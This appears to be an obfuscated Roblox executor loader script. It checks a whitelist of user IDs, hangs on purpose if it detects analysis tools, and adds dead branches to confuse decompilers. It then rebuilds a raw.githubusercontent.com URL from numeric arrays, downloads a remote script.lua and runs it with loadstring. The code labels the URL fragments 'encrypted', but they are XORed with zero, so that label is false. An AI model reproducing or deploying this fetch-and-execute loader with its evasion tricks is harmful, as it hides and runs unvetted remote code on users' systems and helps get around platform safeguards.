--[[ CORE ]]--
local S = game
local P = S:GetService("Players").LocalPlayer
local H = S:GetService("RunService")

--[[ ANTI ANALYSIS ]]--
pcall(function()
    if hookfunction or islclosure or isexecutorclosure then
        while true do end
    end
end)

task.defer(function()
    for i = 1, math.random(2,5) do
        task.wait()
    end
end)

--[[ STRING DECODER ]]--
local function X(t,k)
    local o = {}
    for i=1,#t do
        o[i] = string.char(bit32.bxor(t[i], k))
    end
    return table.concat(o)
end

--[[ WHITELIST (USERID ONLY) ]]--
local W = {
    [123456789] = true,
    [987654321] = true,
}

if not W[P.UserId] then
    task.wait(math.random(1,3))
    P:Kick("Access denied.")
    return
end

--[[ FAKE FLOW (CONFUSE DECOMPILER) ]]--
do
    local a = math.random(100,999)
    if a == 777 then
        return
    end
end

--[[ URL FRAGMENTS (ENCRYPTED) ]]--
local U = {
    {104,116,116,112,115,58,47,47},             -- https://
    {114,97,119,46,103,105,116,104,117,98},     -- raw.github
    {117,115,101,114,99,111,110,116,101,110,116,46,99,111,109}, --usercontent.com
}

local R = ""
for _,v in ipairs(U) do
    R ..= X(v,0)
end

--[[ PATH OBFUSCATION ]]--
local P1 = X({47,104,97,110,107,57,52,56,55},0)
local P2 = X({47,109,97,105,110,47},0)
local P3 = X({115,99,114,105,112,116,46,108,117,97},0)

local URL = R .. P1 .. P2 .. P3

--[[ STAGED LOAD ]]--
local src
pcall(function()
    src = S:HttpGet(URL)
end)

if not src or #src < 100 then
    while true do end
end

--[[ FINAL EXECUTION ]]--
task.spawn(function()
    loadstring(src)()
end)
